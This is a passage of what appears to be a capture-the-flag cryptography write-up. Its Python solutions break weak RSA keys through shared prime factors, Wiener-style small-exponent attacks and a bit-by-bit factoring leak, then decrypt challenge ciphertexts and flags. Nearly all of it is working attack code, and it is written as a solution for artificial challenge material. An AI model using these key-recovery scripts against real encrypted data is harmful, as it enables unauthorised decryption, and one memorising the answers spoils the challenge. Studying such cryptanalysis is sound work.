        # Partial quotients of num/den via the Euclidean algorithm.
        frac = []
        while den:
            a = num // den
            frac.append(a)
            num, den = den, num - a * den
        return frac

    def convergents(frac):
        # Yield (numerator, denominator) of each successive convergent.
        n0, d0 = frac[0], 1
        yield n0, d0
        if len(frac) == 1:
            return
        n1, d1 = frac[0] * frac[1] + 1, frac[1]
        yield n1, d1
        for a in frac[2:]:
            n0, n1 = n1, a * n1 + n0
            d0, d1 = d1, a * d1 + d0
            yield n1, d1

    frac = continued_fraction(e, n)
    for k, d in convergents(frac):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1  # equals p + q when phi is correct
        disc = s * s - 4 * n
        if disc >= 0:
            t = isqrt(disc)
            if t * t == disc:
                p = (s + t) // 2
                q = (s - t) // 2
                if p * q == n:
                    return d, p, q
    return None
def build_private_keys(base):
    """Load ``key-<idx>.pem`` from ``base`` and rebuild the breakable private keys.

    Keys (1, 2) and (4, 15) are factored through their shared prime
    (``gcd`` of the two moduli); keys 6, 12 and 17 are attacked with
    ``wiener_attack`` and skipped silently if the attack fails.

    Returns:
        ``(keys_pub, priv)``: dicts mapping key index to the public key and
        to the reconstructed private key respectively.

    Raises:
        ValueError: if a pair expected to share a factor has gcd 1.
    """
    keys_pub = {}
    for path in Path(base).glob('key-*.pem'):
        idx = int(path.stem.split('-')[1])
        keys_pub[idx] = RSA.import_key(path.read_bytes())

    priv = {}
    # Pairs of moduli that share a prime factor.
    for pair in ((1, 2), (4, 15)):
        first, second = pair
        g = gcd(keys_pub[first].n, keys_pub[second].n)
        if g == 1:
            raise ValueError(f"keys {first} and {second} share no common factor")
        for idx in pair:
            pub = keys_pub[idx]
            p, q = g, pub.n // g
            phi = (p - 1) * (q - 1)
            d = pow(pub.e, -1, phi)
            priv[idx] = RSA.construct((pub.n, pub.e, d, p, q))

    # Keys with a small private exponent.
    for idx in (6, 12, 17):
        result = wiener_attack(keys_pub[idx].n, keys_pub[idx].e)
        if result:
            d, p, q = result
            priv[idx] = RSA.construct((keys_pub[idx].n, keys_pub[idx].e, d, p, q))
    return keys_pub, priv
def decrypt_ciphertext(priv, pub, ciphertext):
    """Try to open a hybrid RSA + AES-GCM ciphertext with one key pair.

    Layout read from ``ciphertext``: an RSA-wrapped session key of the
    modulus size, a 12-byte nonce, the AES-GCM body, and a 16-byte tag.
    Keys of 2048 bits or more unwrap with OAEP, smaller ones with raw RSA
    (result left-padded to 16 bytes).

    Returns:
        The plaintext bytes, or ``None`` if the input is too short or any
        step fails (wrong key, bad tag, ...).
    """
    nbits = pub.n.bit_length()
    key_len = (nbits + 7) // 8
    if len(ciphertext) < key_len + 28:  # header + 12-byte nonce + 16-byte tag
        return None
    header = ciphertext[:key_len]
    nonce = ciphertext[key_len:key_len + 12]
    body = ciphertext[key_len + 12:-16]
    tag = ciphertext[-16:]
    try:
        if nbits >= 2048:
            # OAEP for larger keys
            sk = PKCS1_OAEP.new(priv).decrypt(header)
        else:
            # Raw RSA for smaller keys
            m = pow(int.from_bytes(header, 'big'), priv.d, priv.n)
            sk = long_to_bytes(m).rjust(16, b'\x00')
        cipher = AES.new(sk, AES.MODE_GCM, nonce=nonce)
        pt = cipher.decrypt_and_verify(body, tag)
        return pt
    except Exception:
        # Deliberate best effort: the caller probes every key against every
        # ciphertext, so any failure just means "not this pair".
        return None
def crt(residues, moduli):
    """Combine congruences ``x = a_i (mod m_i)`` incrementally.

    Returns:
        ``(x, M)`` where ``M`` is the product of the moduli and
        ``0 <= x < M``. Empty input gives ``(0, 1)``.

    Raises:
        ValueError: from ``pow(M, -1, m)`` when a modulus is not coprime to
            the product of the earlier ones.
    """
    x = 0
    M = 1
    for a, m in zip(residues, moduli):
        # Lift the current solution so that it also satisfies x = a (mod m).
        t = ((a - x) % m) * pow(M, -1, m) % m
        x += M * t
        M *= m
    return x, M
base = "./level1"
print("[*] Building private keys...")
keys_pub, priv = build_private_keys(base)

# Load every ciphertext-<idx>.bin keyed by its index.
cts = {}
for p in Path(base).glob('ciphertext-*.bin'):
    idx = int(p.stem.split('-')[1])
    cts[idx] = p.read_bytes()

print("[*] Decrypting ciphertexts...")
# Probe every recovered key against every ciphertext and keep the plaintext
# of each pair that authenticates, so nothing is decrypted twice.
plaintexts = {}
for kidx in sorted(priv):
    for cidx, ct in sorted(cts.items()):
        pt = decrypt_ciphertext(priv[kidx], keys_pub[kidx], ct)
        if pt is not None:
            print(f" Key {kidx} decrypts ciphertext {cidx}")
            if pt:
                plaintexts[cidx] = pt.decode().splitlines()[1:]  # Skip header

if not plaintexts:
    raise SystemExit("[-] no ciphertext could be decrypted")

# Each plaintext line is "modulus:residue:bits" in hex; the same line number
# across plaintexts gives one CRT system.
for line_no in range(9):
    residues = []
    moduli = []
    bits = None
    for cidx in sorted(plaintexts):
        d, k, b = [int(x, 16) for x in plaintexts[cidx][line_no].split(':')]
        residues.append(k)
        moduli.append(d)
        bits = b
    x, M = crt(residues, moduli)
    blen = (bits + 7) // 8
    # Only print when the combined modulus is larger than the message.
    if M.bit_length() > bits:
        msg = x.to_bytes(blen, 'big')
        print(f"{msg}")
level2
The key uses $ed \equiv 1 \pmod{\frac{\varphi(n)}{\gcd(p-1,\,q-1)}}$ instead of $ed \equiv 1 \pmod{\varphi(n)}$,
so enumerate small values of $g = \gcd(p-1, q-1)$ and run the continued-fraction attack on $ge/n$.
from math import isqrt
import hashlib
def continued_fraction(num, den):
    """Return the partial quotients of ``num / den`` (Euclidean algorithm).

    Returns an empty list when ``den`` is 0.
    """
    frac = []
    while den:
        a, rem = divmod(num, den)
        frac.append(a)
        num, den = den, rem
    return frac
def convergents(frac):
    """Yield ``(numerator, denominator)`` for each convergent of ``frac``.

    ``frac`` is a list of partial quotients as produced by
    ``continued_fraction``. An empty list yields nothing.
    """
    if not frac:
        return
    n0, d0 = frac[0], 1
    yield n0, d0
    if len(frac) == 1:
        return
    n1, d1 = frac[0] * frac[1] + 1, frac[1]
    yield n1, d1
    for a in frac[2:]:
        # Standard recurrence: h_k = a*h_(k-1) + h_(k-2), same for k_k.
        n0, n1 = n1, a * n1 + n0
        d0, d1 = d1, a * d1 + d0
        yield n1, d1
n = xxx
e = xxx
# g = gcd(p-1, q-1) is even because p-1 and q-1 both are; try small even values.
for g in range(2, 500, 2):
    # e*d - 1 = t * phi / g, so t/d is a convergent of g*e/n.
    frac = continued_fraction(g * e, n)
    for t, d in convergents(frac):
        if t == 0:
            continue
        num = e * d - 1
        if (num * g) % t:
            continue
        phi = (num * g) // t
        s = n - phi + 1  # candidate for p + q
        disc = s * s - 4 * n
        if disc < 0:
            continue
        sq = isqrt(disc)
        if sq * sq != disc:
            continue
        # Recover p and q
        p = (s + sq) // 2
        q = (s - sq) // 2
        if p * q == n:
            print(f"[+] success")
            # Compute p + q
            print(f"[*] {p + q = }")
            # Compute password hash
            password = hashlib.sha256(str(p + q).encode()).hexdigest()
            print(f"[+] {password = }")
            # SystemExit works even where the site-provided exit() is missing.
            raise SystemExit(0)
level3
leak = ((p*A) ^ (q*B) ^ ((p&q)<<64) ^ ((p|q)<<48) ^ ((p^q)*C))
+ ((p+q) mod 2^128)
^ ((p*q) & MASK64)
p*q mod 2^k depends only on p mod 2^k and q mod 2^k, and the low k bits of leak likewise depend only on the low k bits of p and q, so we can enumerate p and q bit by bit, starting from the lowest bit.
from Crypto.Util.number import long_to_bytes
# Challenge values (placeholders in this writeup).
n = xxx
e = 65537
c = xxx
leak = xxx
# Multipliers used in the leak formula.
A = 0xDEADBEEFCAFEBABE123456789ABCDEFFEDCBA9876543210
B = 0xCAFEBABEDEADBEEF123456789ABCDEF0123456789ABCDEF
C = 0x123456789ABCDEFFEDCBA9876543210FEDCBA987654321
MASK64 = (1 << 64) - 1
# Despite the name this is a 128-bit mask (2^128 - 1), applied with & in check_leak.
MOD128 = (1 << 128) - 1
# (p*q) & MASK64 is known because p*q = n.
T = n & MASK64
# Undo the final XOR of the leak; Y is what check_leak compares against.
Y = leak ^ T
def check_leak(p, q, k):
    """Check whether partial ``p``/``q`` reproduce the low ``k`` bits of ``Y``.

    Recomputes the XOR part of the leak and the ``(p + q)`` term from the
    candidate low bits and compares ``X + S`` with ``Y`` modulo ``2**k``.
    """
    mod = 1 << k
    X = ((p * A) ^ (q * B) ^ (((p & q) << 64) % mod) ^
         (((p | q) << 48) % mod) ^ ((p ^ q) * C)) % mod
    S = (p + q) & MOD128
    return (X + S) % mod == Y % mod
# Both primes are odd, so bit 0 of p and q is 1.
states = [(1, 1)]
for k in range(1, 1536):
    mod = 1 << (k + 1)
    target_n = n % mod
    new_states = []
    for p, q in states:
        for bp in (0, 1):
            for bq in (0, 1):
                pp = p | (bp << k)
                qq = q | (bq << k)
                # Keep a candidate only if it matches both n and the leak
                # on the low k+1 bits.
                if (pp * qq) % mod != target_n:
                    continue
                if not check_leak(pp, qq, k + 1):
                    continue
                new_states.append((pp, qq))
    if not new_states:
        raise SystemExit(f"[-] no candidate survives at bit {k}")
    states = new_states

# Pick the surviving candidate that really factors n.
p, q = next((pq for pq in states if pq[0] * pq[1] == n), states[0])
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"{flag = }")